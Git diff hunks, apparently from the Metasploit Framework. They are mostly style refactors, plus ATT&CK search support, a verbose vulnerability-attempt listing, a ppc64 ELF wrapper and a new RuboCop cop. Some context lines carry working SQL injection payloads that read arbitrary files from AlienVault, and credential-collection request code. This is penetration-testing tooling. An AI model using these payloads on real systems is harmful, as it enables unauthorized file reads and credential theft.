  def empty?
-    return platforms.empty?
+    platforms.empty?
  end

  #
  # Returns an array of names contained within this platform list.
  #
  def names
-    platforms.map { |m| m.realname }
+    platforms.map(&:realname)
  end

  #
  # Symbolic check to see if this platform list represents 'all' platforms.
  #
  def all?
-    names.include? ''
+    names.include?('')
  end

  #
-  # Do I support plist (do I support all of they support?)
+  # Do I support platform list (do I support all of they support?)
  # use for matching say, an exploit and a payload
  #
-  def supports?(plist)
-    plist.platforms.each { |pl|
+  def supports?(platform_list)
+    platform_list.platforms.each do |pl|
      supported = false
-      platforms.each { |p|
+      platforms.each do |p|
        if p >= pl
          supported = true
          break
        end
-      }
-      return false if !supported
-    }
+      end
+      return false unless supported
+    end

-    return true
+    true
  end

  #
  # used for say, building a payload from a stage and stager
  # finds common subarchitectures between the arguments
  #
-  def &(plist)
+  def &(other)
    l1 = platforms
-    l2 = plist.platforms
+    l2 = other.platforms
    total = l1.find_all { |m| l2.find { |mm| m <= mm } } |
-          l2.find_all { |m| l1.find { |mm| m <= mm } }
+            l2.find_all { |m| l1.find { |mm| m <= mm } }
    Msf::Module::PlatformList.from_a(total)
  end
 end
@@ -120,6 +120,11 @@ class Msf::Module::SiteReference < Msf::Module::Reference
      self.site = "Logo: #{in_ctx_val}"
    elsif in_ctx_id == 'SOUNDTRACK'
      self.site = "Soundtrack: #{in_ctx_val}"
+    elsif in_ctx_id == 'ATT&CK'
+      match = in_ctx_val.match(/\A(?<category>[A-Z]+)(?<id>[\d.]+)\z/)
+      path = Msf::Mitre::Attack::Categories::PATHS[match[:category]]
+      id_path = match[:id].gsub('.', '/')
+      self.site = "https://attack.mitre.org/#{path}/#{match[:category]}#{id_path}/"
    else
      self.site  = in_ctx_id
      self.site += " (#{in_ctx_val})" if (in_ctx_val)
@@ -12,6 +12,8 @@ module Msf::Modules::Metadata::Search
      adapter
      aka
      arch
+      attack
+      att&ck
      author
      authors
      bid
@@ -183,13 +185,16 @@ module Msf::Modules::Metadata::Search
            when 'arch'
              match = [keyword, search_term] if module_metadata.arch =~ regex
            when 'cve'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^cve\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('cve-') && ref =~ regex }
+            when 'att&ck', 'attack'
+              regex = Regexp.new("\\A#{Regexp.escape(search_term)}(\\.\\d+)*\\Z", Regexp::IGNORECASE)
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('att&ck-') && ref.downcase.delete_prefix('att&ck-') =~ regex }
            when 'osvdb'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^osvdb\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('osvdb-') && ref =~ regex }
            when 'bid'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^bid\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('bid-') && ref =~ regex }
            when 'edb'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ /^edb\-/i and ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref.downcase.start_with?('edb-') && ref =~ regex }
            when 'check'
              if module_metadata.check
                matches_check = %w(true yes).any? { |val| val =~ regex}
@@ -1059,7 +1059,8 @@ class Db
    [ '-R', '--rhosts' ] => [ false, 'Set RHOSTS from the results of the search.' ],
    [ '-S', '--search' ] => [ true, 'Search string to filter by.', '<filter>' ],
    [ '-i', '--info' ] => [ false, 'Display vuln information.' ],
-    [ '-d', '--delete' ] => [ false, 'Delete vulnerabilities. Not officially supported.' ]
+    [ '-d', '--delete' ] => [ false, 'Delete vulnerabilities. Not officially supported.' ],
+    [ '-v', '--verbose' ] => [ false, 'Display additional information.' ]
  )

  def cmd_vulns(*args)
@@ -1073,6 +1074,7 @@ class Db

    search_term = nil
    show_info   = false
+    show_vuln_attempts = false
    set_rhosts  = false
    output_file = nil
    delete_count = 0
@@ -1111,6 +1113,8 @@ class Db
        search_term = val
      when '-i', '--info'
        show_info = true
+      when '-v', '--verbose'
+        show_vuln_attempts = true
      else
        # Anything that wasn't an option is a host to search for
        unless (arg_host_range(val, host_ranges))
@@ -1182,11 +1186,20 @@ class Db
    end

    if output_file
-      File.write(output_file, tbl.to_csv)
-      print_status("Wrote vulnerability information to #{output_file}")
+      if show_vuln_attempts
+        print_warning("Cannot output to a file when verbose mode is enabled. Please remove verbose flag and try again.")
+      else
+        File.write(output_file, tbl.to_csv)
+        print_status("Wrote vulnerability information to #{output_file}")
+      end
    else
      print_line
-      print_line(tbl.to_s)
+      if show_vuln_attempts
+        vulns_and_attempts = _format_vulns_and_vuln_attempts(vulns)
+        _print_vulns_and_attempts(vulns_and_attempts)
+      else
+        print_line(tbl.to_s)
+      end
    end

    # Finally, handle the case where the user wants the resulting list
@@ -2347,6 +2360,50 @@ class Db
    end
  end

+  def _format_vulns_and_vuln_attempts(vulns)
+    vulns.map.with_index do |vuln, index|
+      vuln_formatted = <<~EOF.strip.indent(2)
+        #{index}. Vuln ID: #{vuln.id}
+           Timestamp: #{vuln.created_at}
+           Host: #{vuln.host.address}
+           Name: #{vuln.name}
+           References: #{vuln.refs.map {|r| r.name}.join(',')}
+           Information: #{_format_vuln_value(vuln.info)}
+      EOF
+
+      vuln_attempts_formatted = vuln.vuln_attempts.map.with_index do |vuln_attempt, i|
+        <<~EOF.strip.indent(5)
+          #{i}. ID: #{vuln_attempt.id}
+             Vuln ID: #{vuln_attempt.vuln_id}
+             Timestamp: #{vuln_attempt.attempted_at}
+             Exploit: #{vuln_attempt.exploited}
+             Fail reason: #{_format_vuln_value(vuln_attempt.fail_reason)}
+             Username: #{vuln_attempt.username}
+             Module: #{vuln_attempt.module}
+             Session ID: #{_format_vuln_value(vuln_attempt.session_id)}
+             Loot ID: #{_format_vuln_value(vuln_attempt.loot_id)}
+             Fail Detail: #{_format_vuln_value(vuln_attempt.fail_detail)}
+        EOF
+      end
+
+      { :vuln => vuln_formatted, :vuln_attempts => vuln_attempts_formatted }
+    end
+  end
+
+  def _print_vulns_and_attempts(vulns_and_attempts)
+    print_line("Vulnerabilities\n===============")
+    vulns_and_attempts.each do |vuln_and_attempt|
+      print_line(vuln_and_attempt[:vuln])
+      print_line("Vuln attempts:".indent(5))
+      vuln_and_attempt[:vuln_attempts].each do |attempt|
+        print_line(attempt)
+      end
+    end
+  end
+
+  def _format_vuln_value(s)
+    s.blank? ? s.inspect  : s.to_s
+  end
 end

 end end end end
@@ -380,20 +380,22 @@ module Msf
            print_line
            print_line "Keywords:"
            {
+              'action'      => 'Modules with a matching action name or description',
              'adapter'     => 'Modules with a matching adapter reference name',
              'aka'         => 'Modules with a matching AKA (also-known-as) name',
-              'author'      => 'Modules written by this author',
              'arch'        => 'Modules affecting this architecture',
+              'att&ck'      => 'Modules with a matching MITRE ATT&CK ID or reference',
+              'author'      => 'Modules written by this author',
              'bid'         => 'Modules with a matching Bugtraq ID',
-              'osvdb'       => 'Modules with a matching OSVDB ID',
-              'cve'         => 'Modules with a matching CVE ID',
-              'edb'         => 'Modules with a matching Exploit-DB ID',
              'check'       => 'Modules that support the \'check\' method',
+              'cve'         => 'Modules with a matching CVE ID',
              'date'        => 'Modules with a matching disclosure date',
              'description' => 'Modules with a matching description',
+              'edb'         => 'Modules with a matching Exploit-DB ID',
              'fullname'    => 'Modules with a matching full name',
              'mod_time'    => 'Modules with a matching modification date',
              'name'        => 'Modules with a matching descriptive name',
+              'osvdb'       => 'Modules with a matching OSVDB ID',
              'path'        => 'Modules with a matching path',
              'platform'    => 'Modules affecting this platform',
              'port'        => 'Modules with a matching port',
@@ -405,7 +407,6 @@ module Msf
              'stager'      => 'Modules with a matching stager reference name',
              'target'      => 'Modules affecting this target',
              'type'        => 'Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)',
-              'action'      => 'Modules with a matching action name or description',
            }.each_pair do |keyword, description|
              print_line "  #{keyword.ljust 17}:  #{description}"
            end
@@ -428,6 +429,7 @@ module Msf
            print_line "  search cve:2009 type:exploit platform:-linux"
            print_line "  search cve:2009 -s name"
            print_line "  search type:exploit -s type -r"
+            print_line "  search att&ck:T1059"
            print_line
          end

@@ -1232,6 +1232,16 @@ require 'digest/sha1'
    to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
  end

+  # self.to_linux_ppc64_elf
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_ppc64_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true)
+  end
  # self.to_linux_mipsle_elf
  # Little Endian
  # @param framework [Msf::Framework]
@@ -2178,6 +2188,8 @@ require 'digest/sha1'
          to_linux_x64_elf(framework, code, exeopts)
        when ARCH_AARCH64
          to_linux_aarch64_elf(framework, code, exeopts)
+        when ARCH_PPC64
+          to_linux_ppc64_elf(framework, code, exeopts)
        when ARCH_ARMLE
          to_linux_armle_elf(framework, code, exeopts)
        when ARCH_MIPSBE
@@ -0,0 +1,90 @@
+# frozen_string_literal: trueAdd commentMore actions
+
+module RuboCop
+  module Cop
+    module Lint
+      # Checks for leading or trailing whitespace in Metasploit module metadata keys/values
+      # inside the initialize method. Recursively checks all hash and array values, except for
+      # keys listed in EXEMPT_KEYS.
+      #
+      # EXEMPT_KEYS can be extended to skip additional metadata fields as needed.
+      #
+      # @example
+      #   # bad
+      #   'Name' => ' value '
+      #   'Author' => [' hd']
+      #
+      #   # good
+      #   'Name' => 'value'
+      #   'Author' => ['hd']
+      class DetectMetadataTrailingLeadingWhitespace < Base
+        extend AutoCorrector
+        MSG = 'Metadata key or value has leading or trailing whitespace.'
+        EXEMPT_KEYS = %w[Description Payload BadChars].freeze
+
+        # Called for every method definition node
+        # Only processes the initialize method
+        # @param node [RuboCop::AST::DefNode]
+        def on_def(node)
+          return unless node.method_name == :initialize
+
+          node.each_descendant(:hash) do |hash_node|
+            hash_node.pairs.each do |pair|
+              key = extract_string(pair.key)
+              next if key && EXEMPT_KEYS.any? { |exempt| key.casecmp?(exempt) }
+              check_value(pair.value)
+              if key && (key != key.strip)
+                add_offense(pair.key, message: MSG) do |corrector|
+                  corrector.replace(pair.key.loc.expression, key.strip.inspect)
+                end
+              end
+            end
+          end
+        end
+
+        private
+
+        # Recursively checks a value node for whitespace issues
+        # @param node [RuboCop::AST::Node]
+        def check_value(node)
+          case node.type
+          when :str, :dstr
+            value = extract_string(node)
+            if value && value != value.strip
+              add_offense(node, message: MSG) do |corrector|
+                replacement = node.sym_type? ? ":#{value.strip}" : value.strip.inspect
+                corrector.replace(node.loc.expression, replacement)
+              end
+            end
+          when :array
+            node.children.each { |child| check_value(child) }
+          when :hash
+            node.pairs.each do |pair|
+              key = extract_string(pair.key)
+              next if key && EXEMPT_KEYS.any? { |exempt| key.casecmp?(exempt) }
+              if key && key != key.strip
+                add_offense(pair.key, message: MSG) do |corrector|
+                  corrector.replace(pair.key.loc.expression, key.strip.inspect)
+                end
+              end
+              check_value(pair.value)
+            end
+          end
+        end
+
+        # Extracts the string value from a node (handles str, sym, dstr)
+        # @param node [RuboCop::AST::Node]
+        # @return [String, nil]
+        def extract_string(node)
+          return unless node
+          if node.str_type? || node.sym_type?
+            node.value.to_s
+          elsif node.dstr_type?
+            # For dynamic strings, join all child string values
+            node.children.map { |c| c.is_a?(Parser::AST::Node) ? extract_string(c) : c.to_s }.join
+          end
+        end
+      end
+    end
+  end
+end
@@ -76,7 +76,7 @@ Gem::Specification.new do |spec|
  # Needed for Meterpreter
  spec.add_runtime_dependency 'metasploit-payloads', '2.0.221'
  # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.35'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.42'
  # Needed by msfgui and other rpc components
  # Locked until build env can handle newer version. See: https://github.com/msgpack/msgpack-ruby/issues/334
  spec.add_runtime_dependency 'msgpack', '~> 1.6.0'
@@ -271,6 +271,7 @@ Gem::Specification.new do |spec|
    mutex_m
    ostruct
    rinda
+    syslog
  ].each do |library|
    spec.add_runtime_dependency library
  end
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2024-07-20',
        'DefaultOptions' => {
          'RPORT' => 8443,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2023-11-27',
        'DefaultOptions' => {
          'RPORT' => 30443,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2024-08-05',
        'DefaultOptions' => {
          'RPORT' => 9090,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2024-08-29',
        'DefaultOptions' => {
          'RPORT' => 443,
-          'SSL' => 'True'
+          'SSL' => true
        },
        'License' => MSF_LICENSE,
        'Notes' => {
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
          The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set
          wordpress administration options by overwriting values within the database.

-          The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized
+          The vulnerability is present in WordPress's admin-ajax.php, which allows unauthorized
          users to trigger handlers and make configuration changes because of a failure to do
          capability checks when executing the 'save_setting' internal action.

@@ -22,9 +22,9 @@ class MetasploitModule < Msf::Auxiliary
        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
        'License' => MSF_LICENSE,
        'Notes' => {
-           'Stability' => [CRASH_SAFE],
-           'SideEffects' => [IOC_IN_LOGS],
-           'Reliability' => []
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
        }
      )
    )
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2023-08-17',
        'DefaultOptions' => {
          'RPORT' => 2031,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2023-04-05',
        'DefaultOptions' => {
          'RPORT' => 2031,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2023-08-17',
        'DefaultOptions' => {
          'RPORT' => 2031,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
    ver.each do |v|
      print_status("\t#{v.chomp}")
      report_ora_enum_note(
-        { :component_version => v.chomp },
+        { :component_version => v.chomp }
      )
    end

@@ -85,24 +85,24 @@ class MetasploitModule < Msf::Auxiliary
      if vparm['audit_trail'] == 'NONE'
        print_status("\tDatabase Auditing is not enabled!")
        report_ora_enum_note(
-          { :audit_trail => 'Disabled' },
+          { :audit_trail => 'Disabled' }
        )
      else
        print_status("\tDatabase Auditing is enabled!")
        report_ora_enum_note(
-          { :audit_trail => 'Enabled' },
+          { :audit_trail => 'Enabled' }
        )
      end

      if vparm['audit_sys_operations'] == 'FALSE'
        print_status("\tAuditing of SYS Operations is not enabled!")
        report_ora_enum_note(
-          { :audit_sys_ops => 'Disabled' },
+          { :audit_sys_ops => 'Disabled' }
        )
      else
        print_status("\tAuditing of SYS Operations is enabled!")
        report_ora_enum_note(
-          { :audit_sys_ops => 'Enabled' },
+          { :audit_sys_ops => 'Enabled' }
        )
      end
    end
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
        'DisclosureDate' => '2025-02-13',
        'DefaultOptions' => {
          'RPORT' => 34022,
-          'SSL' => 'False'
+          'SSL' => false
        },
        'Platform' => 'win',
        'Arch' => [ ARCH_CMD ],
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
    report_note(
      :rhost => datastore['RHOSTS'],
      :rport => datastore['RPORT'],
-      :type  => "psexec_command",
+      :type => "psexec_command",
      :name => datastore['COMMAND'],
      :data => { :command_output => output }
    )
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
    #  host: inst.private_ip_address,
    #  type: 'ec2.public_ips',
    #  data: { :eips => eips.join(' ') }
-    #) unless eips.empty?
+    # ) unless eips.empty?
    if inst.public_ip_address && !inst.public_dns_name.empty?
      report_note(
        host: inst.private_ip_address,
@@ -84,10 +84,10 @@ class MetasploitModule < Msf::Auxiliary
      print_status("Found Byte-Range Header DOS at #{uri}")

      report_note(
-        :host   => rhost,
-        :port   => rport,
-        :type   => 'apache.killer',
-        :data   => { :uri => uri }
+        :host => rhost,
+        :port => rport,
+        :type => 'apache.killer',
+        :data => { :uri => uri }
      )

    else
@@ -7,27 +7,33 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
-    super(update_info(info,
-        'Name'          => 'BADPDF Malicious PDF Creator',
-        'Description'   => '
+    super(
+      update_info(
+        info,
+        'Name' => 'BADPDF Malicious PDF Creator',
+        'Description' => %q{
          This module can either creates a blank PDF file which contains a UNC link which can be used
          to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
          code into an existing PDF document if possible.
-        ',
-        'License'       => MSF_LICENSE,
-        'Author'        =>
-            [
-              'Assaf Baharav',    # Code provided as POC by CheckPoint
-              'Yaron Fruchtmann', # Code provided as POC by CheckPoint
-              'Ido Solomon',      # Code provided as POC by CheckPoint
-              'Richard Davy - secureyourit.co.uk', # Metasploit
-            ],
-        'Platform'      => ['win'],
-        'References'    =>
-        [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Assaf Baharav', # Code provided as POC by CheckPoint
+          'Yaron Fruchtmann', # Code provided as POC by CheckPoint
+          'Ido Solomon',      # Code provided as POC by CheckPoint
+          'Richard Davy - secureyourit.co.uk', # Metasploit
+        ],
+        'Platform' => ['win'],
+        'References' => [
          ['CVE', '2018-4993'],
          ['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
-        ])
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
      )
    register_options(
      [
@@ -6,35 +6,42 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
-      'Description'    => %q{
-        This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
-        Although authentication is required, any level of user permission can exploit this vulnerability.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
+        'Description' => %q{
+          This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
+          Although authentication is required, any level of user permission can exploit this vulnerability.

-        Note that 8.2 is not suitable for this.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          Note that 8.2 is not suitable for this.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
          'sinn3r', # Metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CVE', '2016-5810'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
        ],
-      'DisclosureDate' => '2017-01-21'
-    ))
+        'DisclosureDate' => '2017-01-21',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
-      ])
+      ]
+    )
  end

  def do_login
@@ -43,15 +50,15 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')

    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => uri,
+      'method' => 'POST',
+      'uri' => uri,
      'vars_post' => {
        'page' => '/',
-        'pos'  => '',
+        'pos' => '',
        'username' => datastore['WEBACCESSUSER'],
        'password' => datastore['WEBACCESSPASS'],
-        'remMe'    => '',
-        'submit1'  => 'Login'
+        'remMe' => '',
+        'submit1' => 'Login'
      }
    })

@@ -77,11 +84,11 @@ class MetasploitModule < Msf::Auxiliary
  def get_user_cred_detail(sid, user)
    vprint_status("Gathering password for user: #{user}")

-    uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')
+    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')

    res = send_request_cgi({
      'method' => 'GET',
-      'uri'    => uri,
+      'uri' => uri,
      'cookie' => sid,
      'vars_get' => {
        'uname' => user
@@ -106,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary

    res = send_request_cgi({
      'method' => 'GET',
-      'uri'    => uri,
+      'uri' => uri,
      'cookie' => sid
    })

@@ -6,45 +6,50 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
-      'Description'    => %q{
-        AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
-        generation PHP file. This module exploits this to read an arbitrary file from
-        the file system. Any authenticated user is able to exploit it, as administrator
-        privileges aren't required.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+        'Description' => %q{
+          AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
+          generation PHP file. This module exploits this to read an arbitrary file from
+          the file system. Any authenticated user is able to exploit it, as administrator
+          privileges aren't required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['EDB', '32644']
        ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'Platform'       => ['linux'],
-      'Privileged'     => false,
-      'DisclosureDate' => '2014-03-30'))
+        'Platform' => ['linux'],
+        'Privileged' => false,
+        'DisclosureDate' => '2014-03-30',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-      register_options(
+    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
        OptString.new('USERNAME', [ true, 'Single username' ]),
        OptString.new('PASSWORD', [ true, 'Single password' ]),
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
-      ])
-
+      ]
+    )
  end

  def run
-
    print_status("Get a valid session cookie...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -113,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
      full << str
      vprint_status(str)

-      i = i+1
+      i = i + 1
    end

    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
@@ -121,9 +126,9 @@ class MetasploitModule < Msf::Auxiliary
  end

  def sqli(left_marker, right_marker, i, cookie, filename)
-    pay =  "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
-    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
    pay << " GROUP BY x)a) AND 'xnDa'='xnDa"

    get = {
@@ -145,4 +150,3 @@ class MetasploitModule < Msf::Auxiliary
    end
  end
 end
-
@@ -6,46 +6,51 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",
-      'Description'    => %q{
-        AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
-        newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
-        to read an arbitrary file from the file system. Any authenticated user is able to exploit
-        this, as administrator privileges are not required.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+        'Description' => %q{
+          AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
+          newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
+          to read an arbitrary file from the file system. Any authenticated user is able to exploit
+          this, as administrator privileges are not required.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Chris Hebert <chrisdhebert[at]gmail.com>'
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CVE', '2014-5383'],
          ['OSVDB', '106815'],
          ['EDB', '33317'],
          ['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
        ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'Privileged'     => false,
-      'DisclosureDate' => '2014-05-09'))
+        'Privileged' => false,
+        'DisclosureDate' => '2014-05-09',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-      register_options([
-        Opt::RPORT(443),
-        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
-        OptString.new('USERNAME', [ true, 'Single username' ]),
-        OptString.new('PASSWORD', [ true, 'Single password' ]),
-        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
-        OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
-      ])
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
+      OptString.new('USERNAME', [ true, 'Single username' ]),
+      OptString.new('PASSWORD', [ true, 'Single password' ]),
+      OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
+      OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
+    ])
  end

  def run
-
    print_status("Get a valid session cookie...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
@@ -117,7 +122,7 @@ class MetasploitModule < Msf::Auxiliary
          full << str
          vprint_status(str)

-          i = i+1
+          i = i + 1
        end
      end
    rescue ::Timeout::Error
@@ -134,9 +139,9 @@ class MetasploitModule < Msf::Auxiliary
  end

  def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
-    pay =  "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+    pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
-    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+    pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
    pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"

    get = {
@@ -3,36 +3,42 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report
  include Msf::Exploit::JSObfu

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Android Browser File Theft',
-      'Description' => %q{
-        This module steals the cookie, password, and autofill databases from the
-        Browser application on AOSP 4.3 and below.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Found UXSS bug in Android Browser
-        'joev'          # File redirect and msf module
-      ],
-      'License'     => MSF_LICENSE,
